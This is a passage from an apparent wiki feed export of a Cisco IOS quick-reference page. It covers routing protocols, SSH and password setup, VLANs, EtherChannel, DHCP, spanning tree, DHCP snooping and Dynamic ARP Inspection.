=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1116</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1116"/>
		<updated>2026-02-23T19:47:34Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Dynamic ARP Inspection (DAI) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Route / Default Gateway (Router) ===&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
